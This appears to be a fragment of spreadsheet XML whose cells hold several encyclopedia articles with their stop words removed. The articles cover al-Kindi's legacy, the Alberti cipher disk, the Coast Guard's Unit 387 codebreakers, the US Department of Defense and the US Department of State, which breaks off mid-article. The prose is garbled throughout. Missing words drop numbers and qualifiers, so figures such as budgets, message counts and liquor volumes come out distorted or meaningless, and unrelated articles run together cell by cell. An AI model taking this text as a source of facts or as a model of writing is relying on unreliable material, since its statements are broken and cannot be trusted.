philosophers theologians would prepare ground debate. works, says deborah black, contained seeds future controversy would fully realized al-ghazali's incoherence philosophers. legacy al-kindi master many different areas thought held greatest islamic philosophers time. influence fields physics, mathematics, medicine, philosophy, music far-reaching lasted several centuries. al-nadim al-fihrist praised al-kindi work stating: best time, unique knowledge ancient sciences. called philosopher arabs. books deal different sciences, logic, philosophy, geometry, arithmetic, astronomy etc. connected natural philosophers prominence science. al-kindi's major contribution establishment philosophy islamic world efforts trying harmonize philosophical investigation along islamic theology creed. philosophical texts translated supervision would become standard texts islamic world centuries come, even influence eclipsed later philosophers.al-kindi also important figure medieval europe. several books translated latin influencing western authors like robert grosseteste roger bacon. italian renaissance scholar geralomo cardano (1501–1575) considered twelve greatest minds. references bibliography english translations adamson, peter; pormann, peter eds. (2012). philosophical works al-kindī. york: oxford university press. works al-kindi adamson, peter (2007). al-kindī. oxford university press isbn 978-0-19-518142-5. retrieved 2011. adamson, peter january 2005). "al-kindī reception greek philosophy". adamson, peter; taylor, richard (eds.). cambridge companion arabic philosophy. cambridge university press. 32–51. doi:10.1017/ccol0521817439.003. isbn 978-0-521-81743-1. arrington, robert (2001). companion philosophers. oxford: blackwell. isbn 978-0-631-22967-4. corbin, henry (1993). history islamic philosophy. london: keagan paul. isbn 9781135198886. klein-franke, felix (2001). "al-kindi". leaman, oliver; nasr, hossein (eds.). history islamic philosophy. london: routledge. isbn 9780415131599. prioreschi, plinio (2002). "al-kindi, precursor scientific revolution" (pdf). journal international society history islamic medicine. 17–19. prioreschi, plinio (1996). "medicine: al-kindi". history medicine: vol.4 byzantine islamic medicine. omaha: horatius press. 227–235. external links adamson, peter. "al-kindi". zalta, edward (ed.). stanford encyclopedia philosophy. cooper, glen (2007). "kindī: yūsuf yaʿqūb isḥāq al‐kindī". thomas hockey; (eds.). biographical encyclopedia astronomers. york: springer. 635–6. isbn 978-0-387-31022-0. (pdf version) alkindus (bibliotheca augustana) o'connor, john robertson, edmund "abu yusuf yaqub ishaq al-sabbah al-kindi", mactutor history mathematics archive, university andrews al-kindi famous muslims al-kindi's website islamic philosophy online mashhad al-allaf three texts kindi islamic philosophy section benjamnin dyke's translation al-kindi's forty chapters extracts introduction main text texts wikisource: "al-kindi, yusuf ya'ḳub isḥak". international encyclopedia. 1905. "kindī". encyclopædia britannica (11th ed.). 1911. "kindi, yusuf ya'kub ishak al-". encyclopedia americana. 1920.</t>
  </si>
  <si>
    <t>Alberti cipher disk</t>
  </si>
  <si>
    <t>alberti cipher, created 1467 italian architect leon battista alberti, first polyalphabetic ciphers. opening pages treatise componendis cifris explained conversation papal secretary leonardo dati recently developed movable type printing press development cipher wheel. cipher disk alberti's cipher disk embodies first example polyalphabetic substitution mixed alphabets variable period. this device, called formula, made concentric disks, attached common pin, could rotate respect other. larger called stabilis [stationary fixed], smaller called mobilis [movable]. circumference disk divided equal cells. outer ring contains uppercase alphabet plaintext inner ring lowercase mixed alphabet ciphertext. outer ring also includes numbers superencipherment codebook containing phrases assigned numerical values. this effective method concealing code-numbers, since equivalents cannot distinguished garbled letters. sliding alphabets controlled letters included body cryptogram. unequivocal study cipher chapters cifris herewith reproduced english. chapter xiv. first describe movable index. suppose agreed letter index letter movable disk. moment writing position disks formula wish, example juxtaposing index letter capital small letters corresponding capital letters them. when writing you, first write capital corresponds index formula. this means want read message must identical formula you, turning movable disk letter corresponds index thus small letters ciphertext receive meaning sound stationary disk. when written three four words change position index formula, turning disk until, say, index capital then write capital message point onward small longer mean letters follow text, receive meanings capital letters stationary disk. when read message received, advised capital letter, know used signal, moment position movable disk index changed. hence, also place index capital letter, able read understand text easily. four letters movable disk facing four numbered cells outer ring have, speak, meaning inserted nulls within text. however, used groups repeated, great advantage, explain later on.chapter also choose index letter among capital letters agree index. suppose chose letter index. first letter appear message small will, hence, turning movable disk formula place letter capital serves index. follows take sound meaning letters continue writing manner described earlier movable index. when necessary change disks formula, insert one, more, numeral letters message, letters small disk facing numbers corresponds let’s say, etc. turning movable disk juxtapose letter agreed upon index and, successively, required logic writing, continue giving value capitals small letters. confuse scrutinizers also agree correspondent capital letters intermingled message function nulls must disregarded, resort similar conventions, worth recalling. thus changing position index rotating movable disk, able express phonetic semantic value capital letter means twenty-four different alphabetic characters, whereas small letter correspond capital letter four numbers alphabet stationary disk. come convenient numbers, admirable. usage first method encipherment lowercase letter smaller ring used index. example letter inner ring chosen index moved uppercase letter case stationary ring. alphabets (see figure): abcdefgilmnopqrstvxz1234 stationary disk gklnprtuz&amp;xysomqihfdbace movable disk dispatch: guerra farà ...” _lagver2ra_ plaintext azgthpmamgq ciphertext letters included cryptogram. small letter resulting encipherment number null must discarded decipherment. after enciphering letters different uppercase letter inserted cryptogram movable disk accordingly rotated obtaining combination: qrstvxz1234abcdefgilmnop stationary disk gklnprtuz&amp;xysomqihfdbace movable disk encipherment resume thus: _sifarà plaintext qlfiyky ciphertext procedure continued different letters message. second method encipherment uppercase letter stationary disk used index. example letter chosen index small movable disk juxtaposed index letter. changes alphabets indicated enciphering four numbers. abcdefgilmnopqrstvxz1234 stationary disk mqihfdbacegklnprtuz&amp;xyso movable disk dispatch: guerra farà ..." _lagvera3 plaintext mcmbufpms ciphertext omitted defy cryptanalysis. presence letter enciphering number indicates need turning movable disk position. letter moved letter abcdefgilmnopqrstvxz1234 stationary disk somqihfdbacegklnprtuz&amp;xy movable disk encipherment resume thus: _sifarà plaintext sndhsls ciphertext procedure continued message, using four numbers designate alphabet shifts. alberti disk encipherment nothing affine shifts, keyword shifts, caesar shift vigenère ciphers. caesar’s cipher simple substitution based sliding single ordinary alphabet fixed key. once equivalent letter discovered equivalent cipher letters known. with alberti cipher mixed alphabets varies continuously encryption, therefore discovery single letter permit progress. frequency analysis also impossible letter always enciphered differently. vigenère cipher based single ordinary alphabet like caesar easily solved discovering fixed period means kasiski exam. this possible alberti. cryptanalysis leon battista alberti’s invention revolutionized encryption. compared previous ciphers time alberti cipher impossible break without knowledge method. this frequency distribution letters masked frequency analysis known technique attacking ciphers time help. also convenient vigenère cipher. references publications alberti, leon battista, treatise ciphers, trans. zaccagnini. foreword david kahn, galimberti, torino 1997. buonafalce, augusto, exercise solving alberti disk”. cryptogram liv, aca, plano 1999.</t>
  </si>
  <si>
    <t>Alberti cipher</t>
  </si>
  <si>
    <t>United States Coast Guard Unit 387 Cryptanalysis Unit</t>
  </si>
  <si>
    <t>united states coast guard unit became official cryptanalytic unit coast guard collecting communications intelligence coast guard, u.s. department defense, federal bureau investigation (fbi) 1931. prior becoming official, unit worked u.s. treasury department intercepting communications prohibition. unit briefly absorbed u.s. navy 1941 world (wwii) returning coast guard unit following war. unit contributed significant success deciphering runner codes prohibition later axis agent codes wwii, leading breaking several code systems including green enigma machines. rise unit u.s. coast guard (uscg) unit established 1920s small embedded unit uscg. become officially named unit 1931, named uscg unit elizebeth friedman. united states government established code-communications unit intercept ship communications track prohibition breakers “rum runners” increasingly using radio code systems communication. there increasing need code-breaking encoding capabilities counter runners, sophisticated criminals attempting intercept government communications well. 1927, uscg intercepted hundreds messages lacked resources personnel needed codebreaking. therefore, u.s. treasury department appointed william elizebeth friedman, couple famous cryptology, create code systems uscg operations prohibition violators decrypt messages accumulating.the friedmans famous cryptographers expansive careers washington u.s. army, navy, treasury justice departments throughout wwii. 1927, runners commonly used coding systems, switching every months. mid-1930, runners significantly increased coding abilities virtually every boat coding system. from april 1929 january 1930, francisco intelligence collection station alone intercepted 3,300 messages discovered approximately distinct secret coding systems varied five subsystems codes ciphers used runners. between 1927 1928, uscg unit successfully reduced flow illegal smuggling percent, million gallons liquor million, breaking coding systems. example successes took place september 1930, unit intercepted message sent shore station vancouver, british columbia intended runner operating gulf mexico. coded message contained five columns words each. when decoded unit, message read “henry cannot take goods now. proceed miles east briton island give louis comes.”their successes part uscg interception decryption capabilities, innovation fusing together all-source intelligence human intelligence (humint), imagery intelligence (imint) communications intelligence (comint). cryptanalytic unit used uscg patrol boats high-frequency direction finding gear (hfdf, also nicknamed “huff duff”) created william friedman, elizebeth's code-breaking expertise locate illicit radio stations runners sea. uscg today credits operations first tactical enforcement comint u.s. history. elizebeth alone decrypted approximately 12,000 messages runner networks three-year time span. unit decrypted total approximately 25,000 messages year prohibition. following success, uscg requested elizebeth contribute expanding operations, including codebreaking smugglers’ communications aiding uscg partners customs bureau secret service. u.s. treasury department officially transferred coast guard june 1931 work cryptanalyst build new, official cryptanalytic unit within coast guard. began hiring training young professionals cryptanalysts, women expertise stenography backgrounds physics, chemistry, math. these young professionals trained cryptanalysis officially became uscg unit 387. successful techniques codebreaking hfdf technology later used unit clandestine operations wwii, collecting information central south america. unit involvement wwii following repeal prohibition, uscg unit continued intercepting communications counter smugglers attempting evade liquor taxes traffic narcotics. unit intercepted communications, discovered similar message traffic that, decrypted, suggested non-neutral activities axis agents latin america. worldwide aggression intensified 1930s, u.s. treasury department requested elizebeth friedman unit officially shift focus counter-narcotics non-neutral communications march 1938. u.s. treasury department expanded unit's functions include monitoring ships communications germany, italy, central south america. u.s. navy absorbed uscg unit name op-20-gu, later op-g-70, 1941. main responsibilities included monitoring worldwide clandestine radio intelligence comint collection. although unit unofficially conducting clandestine operations, coast guard officially assigned clandestine operations outside western hemisphere, within western hemisphere joint operations june 1942.the unit discovered several commercial firms mexico central south america encrypting communications germany, breaking neutrality laws. throughout wwii, unit used hfdf technology intercept approximately 10,000 enemy communications german clandestine networks played role cracking “enigma code green enigma, enigma, berlin-madrid machine, hamburg-bordeaux stecker codes. their hfdf stations expanded cover united states primary stations, nine secondary stations, contributory stations, five coast guard radio stations. uscg also cutters, trucks, briefcases, handbags hfdf technology inside track “wildcat” stations across us.the director edgar hoover believed intercepting messages german agents latin america would instrumental eliminating nazi networks therefore, coast guard unit also aided intercepting decrypting messages beginning around 1940. unit efforts deciphering codes january 1940, uscg unit intercepted suspicious circuits transmitted five messages day. initially, operators know method language enciphered text, delayed success attempts solve message codes. once coast guard intercepted sixty seventy codes, became apparent language used enciphered text german encryption method used likely word separator. operators knew messages flush depth, ciphering term means encrypted messages correctly superimposed, starting point key. they discovered intercepted messages likely enciphered using commercial enigma machine indicators language used observation plain letter represented ciphered text.” coast guard copy commercial version enigma well manufacturer's instructions use. instructions hinted common practice using separator words using numbers represent equivalent letters displayed keyboard enigma machine. example number-word pairing “1-q, 2-w, 3-e, 4-r, 5-t.” after discovering first alphabets, unit created technique solving reflector successive wheels commercial enigma machine, complete solution wiring machine.in 1940, coast guard intercepted messages transmitted mexico-nauen circuit. when decrypted, messages contained series numbers represented pages line numbers dictionary. cryptanalytic unit discovered number series repeated several messages experimentation, realized number series spelled “berlin” “bremen.” unit used values messages intercepted deciphered additional words: german agent's names “max” “glenn,” several ship names, departure dates, types cargo. unit able figure alphabet associated numbers messages sent circuit. eventually unit also located dictionary used encode messages, titled “langenscheidts taschenwoerterbuch spanischen deutschen sprache.” they able decode messages sent using dictionary code following discovery.between 1940 1942, coast guard intercepted messages latin america germany commonly using rudolph mosse code passing sudamero sudameriat, mexico; sudameriat, hamburg; sudamvorst, sudamero, sudameriat, berlin.” rudolph mosse type code letters code group transposed fixed alphabetic substitution last letters. these messages became known opalu messages. axis agents would send indicator “opalu” first group letters sending message.in 1942, unit 387, help federal communications commission (fcc) radio security service (rss) intercepted messages sent stations called tqi2 tim2. they believed tqi2 europe tim2 south america. between october december year, unit intercepted messages. applying lessons learned solving commercial enigma machine techniques passed british, unit able solve green enigma machine encrypting messages. british determined wheel motion patterns used many enigma machines german agents europe. since unit able decrypt several messages tqi2 tim2, text revealing messages communications berlin argentina, able apply british techniques determine machine's wheel motion patterns monthly ring settings agents used encrypt messages. unit idea wheel patterns monthly ring settings january 1943, confirmed messages sent berlin argentina june july year. following messages, knew cracked green enigma machine.following success solving green enigma, unit intercepted communications argentina berlin encrypted green enigma november 1943. using known keys, unit revealed following message: “the trunk transmitter with accessories enigma arrived red. thank very much. from message shall encipher with enigma. shall give device green. please acknowledge return message with enigma.” messages sent berlin argentina confirming arrival enigma machine. axis agents encoded messages using kryha machine, coast guard already keys. after reading series messages sent german agents berlin latin america talking “red” section keys, unit decrypted enigma machine using similar methods. also signals intelligence army op-20-g references</t>
  </si>
  <si>
    <t>United States Department of Defense</t>
  </si>
  <si>
    <t>united states department defense (dod, usdod dod) executive branch department federal government charged coordinating supervising agencies functions government directly related national security united states armed forces. largest employer world, million active-duty service members (soldiers, marines, sailors, airmen, guardians) 2021. more employees include 826,000 national guard reservists armed forces, 732,000 civilians bringing total million employees. headquartered pentagon arlington, virginia, outside washington, d.c., dod's stated mission provide "the military forces needed deter ensure nation's security".the department defense headed secretary defense, cabinet-level head reports directly president united states. beneath department defense three subordinate military departments: department army, department navy, department force. addition, four national intelligence services subordinate department defense: defense intelligence agency (dia), national security agency (nsa), national geospatial-intelligence agency (nga), national reconnaissance office (nro). other defense agencies include defense advanced research projects agency (darpa), defense logistics agency (dla), missile defense agency (mda), defense health agency (dha), defense threat reduction agency (dtra), defense counterintelligence security agency (dcsa), space development agency (sda) pentagon force protection agency (pfpa), subordinate secretary defense. additionally, defense contract management agency (dcma) responsible administering contracts dod. military operations managed eleven regional functional unified combatant commands. department defense also operates several joint services schools, including eisenhower school (es) national college (nwc). history faced rising tensions thirteen colonies british government, first actions taken first continental congress september 1774 recommend colonies begin defensive military preparations. mid-june 1775, outbreak revolutionary war, second continental congress, recognizing necessity national army could move fight beyond boundaries particular colony, organized continental army june 1775. this momentous event commemorated u.s. annually flag day. later year, congress would charter continental navy october, continental marines november. department navy department upon seating u.s. congress march 1789, legislation create military defense force stagnated focused concerns relevant setting government. president george washington went congress remind duty establish military twice time. finally, last session, september 1789, congress created department. department handled naval affairs congress created navy department 1798. secretaries department reported directly president cabinet-level advisors 1949, military departments became subordinate secretary defense. national military establishment after world president harry truman proposed creation unified department national defense. special message congress december 1945, president cited wasteful military spending inter-departmental conflicts. deliberations congress went months focusing heavily role military society threat granting much military power executive.on july 1947, truman signed national security 1947, unified military command known "national military establishment", well creating central intelligence agency, national security council, national security resources board, united states force (formerly army forces) joint chiefs staff. placed national military establishment control single secretary defense. national military establishment formally began operations september, senate confirmed james forrestal first secretary defense. national military establishment renamed "department defense" august 1949 absorbed three cabinet-level military departments, amendment original 1947 law.under department defense reorganization 1958 (pub.l. 85–599), channels authority within department streamlined still maintaining ordinary authority military departments organize, train, equip associated forces. clarified overall decision-making authority secretary defense respect subordinate military departments clearly defined operational chain command u.s. military forces (created military departments) running president secretary defense unified combatant commanders. also provided legislation centralized research authority, advanced research projects agency, eventually known darpa. written promoted eisenhower administration signed august 1958. financial discrepancies september attacks 2001, secretary defense donald rumsfeld announced department unable account $2.3 trillion worth transactions. reuters reported 2013 pentagon federal agency released annual audits required 1992 law. according reuters, pentagon "annually reports congress books disarray audit impossible". june 2016, office inspector general released report stating army made $6.5 trillion wrongful adjustments accounting entries 2015. organizational structure secretary defense, appointed president advice consent senate, federal u.s.c. 113) head department defense, "the principal assistant president matters relating department defense", "authority, direction, control department defense". because constitution vests military authority congress president, statutory authority secretary defense derived constitutional authority. since impractical either congress president participate every piece department defense affairs, secretary defense secretary's subordinate officials generally exercise military authority. department defense composed office secretary defense (osd), joint chiefs staff (jcs) joint staff (js), office inspector general (dodig), combatant commands, military departments (department army (da), department navy (don) department force (daf)), defense agencies department defense field activities, national guard bureau (ngb), offices, agencies, activities, organizations, commands established designated law, president secretary defense. department defense directive 5100.01 describes organizational relationships within department, foundational issuance delineating major functions department. latest version, signed former secretary defense robert gates december 2010, first major re-write since 1987. office secretary defense office secretary defense (osd) secretary his/her deputy's (mainly) civilian staff. principal staff element secretary defense exercise policy development, planning, resource management, fiscal program evaluation oversight, interface exchange u.s. government departments agencies, foreign governments, international organizations, formal informal processes. also performs oversight management defense agencies, department defense field activities, specialized cross functional teams. defense agencies also supervises following defense agencies: national intelligence agencies several defense agencies members united states intelligence community. these national-level intelligence services operate department defense jurisdiction simultaneously fall authorities director national intelligence. they fulfill requirements national policymakers planners, serve combat support agencies, also assist non-department defense intelligence enforcement services central intelligence agency federal bureau investigation. military services intelligence elements distinct subject coordination national intelligence agencies department defense. department defense manages nation's coordinating authorities assets disciplines signals intelligence, geospatial intelligence, measurement signature intelligence, also builds, launches, operates intelligence community's satellite assets. department defense also human intelligence service, contributes cia's human intelligence efforts also focusing military human intelligence priorities. these agencies directly overseen undersecretary defense intelligence. national intelligence agencies department defense joint chiefs staff joint chiefs staff (jcs) body senior uniformed leaders department defense advise secretary defense, homeland security council, national security council president military matters. composition joint chiefs staff defined statute consists chairman joint chiefs staff (cjcs), vice chairman joint chiefs staff (vcjcs), senior enlisted advisor chairman (seac), military service chiefs army, marine corps, navy, force, space force, addition chief national guard bureau, appointed president following senate confirmation. each individual military service chiefs, outside joint chiefs staff obligations, works directly secretary military department concerned: secretary army, secretary navy secretary force.following goldwater–nichols 1986 joint chiefs staff operational command authority, neither individually collectively, chain command goes president secretary defense, secretary defense commanders combatant commands. goldwater–nichols also created office vice-chairman, chairman designated principal military adviser secretary defense, homeland security council, national security council president. joint staff (js) headquarters staff pentagon made personnel four services assist chairman vice chairman discharging duties, managed director joint staff (djs) lieutenant general vice admiral. military departments services there three military departments within department defense: department army, within united states army organized. department navy, within united states navy united states marine corps organized. department force, within united states force united states space force organized.the military departments headed secretary (i.e., secretary army, secretary navy secretary force), appointed president, advice consent senate. they legal authority title united states code conduct affairs respective departments within military services organized. secretaries military departments law) subordinate secretary defense secdef delegation) deputy secretary defense. secretaries military departments, turn, normally exercise authority forces delegation respective service chiefs (i.e., chief staff army, commandant marine corps, chief naval operations, chief staff force, chief space operations) forces assigned combatant command.secretaries military departments service chiefs possess operational command authority u.s. troops (this power stripped defense reorganization 1958), instead, military departments tasked solely "the training, provision equipment, administration troops." military departments department defense military services department defense unified combatant commands unified combatant command military command composed personnel/equipment least military departments, broad/continuing mission.these military departments responsible equipping training troops fight, unified combatant commands responsible military forces' actual operational command. almost operational u.s. forces authority unified command. unified commands governed unified command plan—a frequently updated document (produced dod), lays command's mission, geographical/functional responsibilities, force structure.during military operations, chain command runs president secretary defense combatant commanders combatant commands.as 2019 united states eleven combatant commands, organized either geographical basis (known "area responsibility", aor) global, functional basis: u.s. northern command (usnorthcom) u.s. southern command (ussouthcom) u.s. central command (uscentcom) u.s. european command (useucom) u.s. indo-pacific command (usindopacom) u.s. africa command (usafricom) u.s. strategic command (usstratcom) u.s. special operations command (ussocom) u.s. transportation command (ustranscom) u.s. cyber command (uscybercom) u.s. space command (usspacecom) budget department defense spending 2017 3.15% accounted budgeted global military spending next largest militaries combined. 2019, 27th secretary defense begun line-by-line review defense budget; 2020 secretary identified items amounting $5.7 billion, $106 billion subtotal (the so-called "fourth estate" agencies missile defense, defense intelligence, amounting defense budget), re-deploy modernization hypersonics, artificial intelligence, missile defense. beyond 2021 27th secretary defense projecting need yearly budget increases percent modernize.the department defense accounts majority federal discretionary spending. 2017, department defense budgeted spending accounted u.s. federal budget, federal discretionary spending, represents funds accounted pre-existing obligations. however, include many military-related items outside defense department budget, nuclear weapons research, maintenance, cleanup, production, department energy budget, veterans affairs, treasury department's payments pensions military retirees widows families, interest debt incurred past wars, state department financing foreign arms sales militarily-related development assistance. neither include defense spending military nature, department homeland security, counter-terrorism spending fbi, intelligence-gathering spending nsa. 2010 united states federal budget, department defense allocated base budget $533.7 billion, $75.5 billion adjustment respect 2009, $130 billion overseas contingencies. subsequent 2010 department defense financial report shows total budgetary resources fiscal year 2010 $1.2 trillion. resources, $1.1 trillion obligated $994 billion disbursed, remaining resources relating multi-year modernization projects requiring additional time procure. after decade non-compliance, congress established deadline fiscal year 2017 department defense achieve audit readiness.in 2015 allocation department defense $585 billion, highest level budgetary resources among federal agencies, amounts one-half annual federal expenditures united states federal budget discretionary budget.on 9/28/2018, president donald trump signed department defense labor, health human services, education appropriations act, 2019 continuing appropriations act, 2019 (h.r.6157) law. september 2018, fy2018 budget expired fy2019 budget came effect. fy2019 fy2019 budget department defense approximately $686,074,048,000 (including base overseas contingency operations emergency funds) discretionary spending $8,992,000,000 mandatory spending totaling $695,066,000,000 undersecretary defense (comptroller) david norquist said hearing regarding 2019 budget: "the overall number often hear $716 billion. that amount funding national defense, accounting code 050, includes simply department defense. includes, example, department energy others. that large number, back billion non-defense agencies, $686 billion. that funding department defense, split $617 billion base billion overseas contingency."the department defense budget encompasses majority national defense budget approximately $716.0 billion discretionary spending $10.8 billion mandatory spending $726.8 billion total. total, $708.1 billion falls jurisdiction house committee armed services senate armed services committee subject authorization annual national defense authorization (ndaa). remaining $7.9 billion falls jurisdiction congressional committees.the department defense unique federal entities majority funding falls discretionary category. majority entire federal budget mandatory, much discretionary funding budget consists dollars. budget overview numbers rounding energy department defense largest single consumer energy united states 2006. largest carbon pollutors history, producing carbon emissions total emissions countries combined.in 2006, department used almost 30,000 gigawatt hours (gwh) electricity, cost almost $2.2 billion. department's electricity would supply enough electricity power million average american homes. electricity consumption, country, department would rank 58th world, using slightly less denmark slightly syria (cia world factbook, 2006).the department defense responsible government fuel consumption 2007 (department force: 52%; department navy: 33%; department army: department components: 1%). department defense uses 4,600,000,000 gallons (1.7×1010 fuel annually, average 12,600,000 gallons (48,000,000 fuel day. large army division 6,000 gallons (23,000 day. according 2005 world factbook, country, department defense would rank 34th world average daily use, coming behind iraq ahead sweden. force largest user fuel energy federal government. force uses nation's aviation fuel. (jp-8 accounts nearly fuels.) this fuel usage breaks such: fuel, facility management ground vehicle/equipment. criticism latest center effective government analysis federal agencies receive freedom information requests, published 2015 (using 2012 2013 data, recent years available), earned possible points, grade. while improved failing grade 2013, still scores processing requests (55%) disclosure rules (42%). 2013 reuters investigation concluded defense finance accounting service, department defense’s primary financial management arm, implements monthly “unsubstantiated change actions”—illegal, inaccurate “plugs”—that forcibly make dod’s books match treasury’s books. concluded:fudging accounts false entries standard operating procedure… reuters found pentagon largely incapable keeping track vast stores weapons, ammunition, supplies; thus continues spend money supplies doesn’t need storing others long date. amassed backlog half trillion dollars… [h]ow much money paid actual goods services delivered isn’t known.in 2015, pentagon consulting firm performed audit department defense's budget. found $125 billion wasteful spending could saved next five years without layoffs reduction military personnel. 2016, washington post uncovered rather taking advice auditing firm, senior defense officials suppressed report public avoid political scrutiny.shortly 2020 baghdad international airport airstrike, iranian parliament designated u.s. military, including department defense, terrorist organization. related legislation organization functions department defense title united states code. other significant legislation related department defense includes: 1947: national security 1947 1958: department defense reorganization act, pub.l. 85–599 1963: department defense appropriations act, pub.l. 88–149 1963: military construction authorization act, pub.l. 88–174 1967: supplemental defense appropriations act, pub.l. 90–8 1984: department defense authorization act, pub.l. 98–525 1986: goldwater-nichols 1986 (department defense reorganization act), pub.l. 99–433 1996: antiterrorism effective death penalty act, pub.l. 104–132 (text) (pdf) also references external links official website department defense usaspending.gov department defense federal register office under secretary defense (comptroller) budget financial management policy death taxes: 2009—a visual guide infographic 2009 united states federal budget, including department defense data provided comptrollers office. department defense policy chart works united states department defense project gutenberg works united states department defense internet archive department defense collection internet archive</t>
  </si>
  <si>
    <t>United States Department of State</t>
  </si>
  <si>
    <t>united states department state (dos), state department, executive department u.s. federal government responsible nation's foreign policy foreign relations. equivalent ministry foreign affairs nations, primary duties advising u.s. president, administering diplomatic missions, negotiating international treaties agreements, representing u.s. united nations. department headquartered harry truman building, blocks white house, foggy bottom neighborhood washington, d.c.; "foggy bottom" thus sometimes used metonym. established 1789 first administrative u.s. executive branch, state department considered among powerful prestigious executive agencies. headed secretary state, reports directly u.s. president member president's cabinet. analogous foreign minister, secretary state serves federal government's chief diplomat representative abroad, first cabinet official order precedence presidential line succession. position currently held antony blinken appointed president biden confirmed senate january 2021 vote 78–22.as 2019, state department maintains diplomatic posts worldwide, second china's ministry foreign affairs. also manages foreign service, provides diplomatic training officials military personnel, exercises partial jurisdiction immigration, provides various services americans, issuing passports visas, posting foreign travel advisories, advancing commercial ties abroad. department administers oldest civilian intelligence agency, bureau intelligence research, maintains enforcement arm, diplomatic security service. history eighteenth century articles confederation designate separate executive branch government. foreign affairs delegated committee secret correspondence congress confederation 1775, based committee correspondence used colony massachusetts communicate colonies. committee secret correspondence renamed committee foreign affairs 1777. 1781, department foreign affairs established permanent body replace committee foreign affairs, office secretary foreign affairs established lead department.the u.s. constitution, drafted september 1787 ratified following year, gave president responsibility conducting federal government's affairs foreign states. end, july 1789, first congress approved legislation reestablish department foreign affairs government, president george washington signed july making department first federal agency created constitution. this legislation remains basic department state.in september 1789, additional legislation changed name agency department state assigned variety domestic duties, including managing united states mint, keeping great seal united states, administering census. president washington signed legislation september most domestic duties gradually transferred various federal departments agencies established 19th century. however, secretary state still retains domestic responsibilities, serving keeper great seal officer president vice president wishing resign must deliver instrument writing declaring decision. reflecting fledgling status time, department state secretary jefferson comprised personnel, diplomatic posts london paris), consular posts. when jefferson took charge department, clerk oversaw foreign office another oversaw home office. congress authorized department hire chief clerk office june 1790, offices consolidated single clerk following month. 1793, responsibility patents transferred cabinet department state. office superintendent patents created carry responsibility, office recognized congress 1830. nineteenth century much history, department state composed primary administrative units: diplomatic service, staffed legations embassies, consular service, primarily responsible promoting american commerce abroad assisting distressed american sailors. each service developed separately, lacked sufficient funding provide career; consequently, appointments either service fell financial means sustain work abroad. combined common practice appointing individuals based politics patronage, rather merit, department largely favor political networks wealth, rather skill knowledge.in 1833, secretary state louis mclane oversaw major restructure department state formal collection seven bureaus: diplomatic bureau; consular bureau; home bureau; bureau archives, laws, commissions; bureau pardons remissions, copyrights, care library; disbursing superintending bureau; translating miscellaneous bureau. successor john forsyth reduced number four following year, overseen chief clerk: diplomatic bureau; consular bureau; home bureau; keeper archives, translator, disbursing agent.the office commissioner patents created 1836. 1842, department state required report congress foreign commercial systems, clerk within department assigned responsibility arranging information. this position established superintendent statistics 1854 statistical office created within department. 1853, office assistant secretary state created oversee heads bureau.a commissioner immigration existed 1864 1868. examiner claims established 1868 address claims american citizens foreign nations, abolished 1868 reestablished 1870 newly established bureau. 1870, secretary state hamilton fish reorganized department twelve bureaus: chief clerk's bureau, diplomatic bureaus, consular bureaus, bureau, bureau accounts, statistical bureau, bureau translations, bureau pardons commissions, bureau domestic records, passport bureau. bureaus law, translations, domestic records consisted single person responsible duty. mail division established 1872 office keeper rolls made independent chief clerk's bureau 1873.congress legally recognized bureau system provided official salaries bureau positions 1873. following congressional recognition, several acts congress modified structure bureaus 1874 1882. nineteenth century, department consisted chief clerk's bureau, diplomatic bureau, consular bureau, bureau accounts, bureau foreign commerce, bureau appointments, bureau archives. other offices, translator, also operated separately bureau system. twentieth century 1903, bureau foreign commerce transferred newly created department commerce labor, bureau replaced office facilitate transfer information consular offices department. passport bureau restored year, name changed bureau citizenship 1907. department underwent major reform 1909 congress expanded funding. separate divisions established within department latin american affairs, eastern affairs, near eastern affairs, western european affairs, information. additional division mexican affairs established 1915. bureau trade relations abolished 1912 replaced office foreign trade advisers, office adviser commercial treaties split office 1916.during world bureau citizenship tasked vetting every person entered departed united states ensure public safety. branches bureau citizenship opened york francisco. final months world bureau citizenship split division passport control visa office. other changes made world include conversion division information division foreign intelligence 1917 establishment correspondence bureau 1918. division russian affairs established 1919, division political information established 1920.the department state underwent first major overhaul rogers 1924, merged diplomatic consular services foreign service, professionalized personnel system secretary state authorized assign diplomats abroad. extremely difficult foreign service examination also implemented ensure highly qualified recruits, along merit-based system promotions. rogers also created board foreign service, advises secretary state managing foreign service, board examiners foreign service, administers examination process. post-second world period unprecedented increase funding staff commensurate us's emergence superpower competition soviet union subsequent cold war. consequently, number domestic overseas employees grew roughly 2,000 1940 13,000 1960.in 1997, madeleine albright became first woman appointed secretary state first foreign-born woman serve cabinet. twenty-first century 21st century department reinvent response rapid digitization society global economy. 2007, launched official blog, dipnote, well twitter account name, engage global audience. internally, launched wiki, diplopedia; suggestion forum called sounding board; professional networking software, "corridor". 2009, virtual student federal service (vsfs) created provide remote internships students. year, department state fourth desired employer undergraduates according businessweek.from 2009 2017, state department launched 21st century statecraft, official goal "complementing traditional foreign policy tools newly innovated adapted instruments statecraft fully leverage technologies interconnected world." initiative designed utilize digital technology internet promote foreign policy goals; examples include promoting campaign provide disaster relief pakistan, sending personnel libya assist developing internet infrastructure e-government.colin powell, department 2001 2005, became first african-american hold post; immediate successor, condoleezza rice, second female secretary state second african-american. hillary clinton became third female secretary state appointed 2009. 2014, state department began expanding navy hill complex across 23rd street truman building. joint venture consisting architectural firms goody, clancy louis berger group $2.5 million contract january 2014 begin planning renovation buildings 11.8 acres (4.8 navy hill campus, housed world headquarters office strategic services first headquarters central intelligence agency. duties responsibilities executive branch congress constitutional responsibilities foreign policy. within executive branch, department state lead foreign affairs agency, head, secretary state, president's principal foreign policy advisor. department advances objectives interests world primary role developing implementing president's foreign policy. also provides array important services citizens foreigners seeking visit immigrate united states. foreign affairs activities—us representation abroad, foreign assistance programs, countering international crime, foreign military training programs, services department provides, more—are paid foreign affairs budget, represents little total federal budget.the department's core activities purpose include: protecting assisting citizens living traveling abroad; assisting american businesses international marketplace; coordinating providing support international activities agencies (local, state, federal government), official visits overseas home, diplomatic efforts. keeping public informed foreign policy relations countries providing feedback public administration officials. providing automobile registration non-diplomatic staff vehicles vehicles diplomats foreign countries diplomatic immunity united states.the department state conducts activities civilian workforce, normally uses foreign service personnel system positions require service abroad. employees assigned diplomatic missions abroad represent united states, analyze report political, economic, social trends; adjudicate visas; respond needs citizens abroad. maintains diplomatic relations countries maintains relations many international organizations, adding posts around world. united states, 5,000 professional, technical, administrative employees work compiling analyzing reports overseas, providing logistical support posts, communicating american public, formulating overseeing budget, issuing passports travel warnings, more. carrying responsibilities, department state works close coordination federal agencies, including departments defense, treasury, commerce. department also consults congress foreign policy initiatives policies. organization secretary state 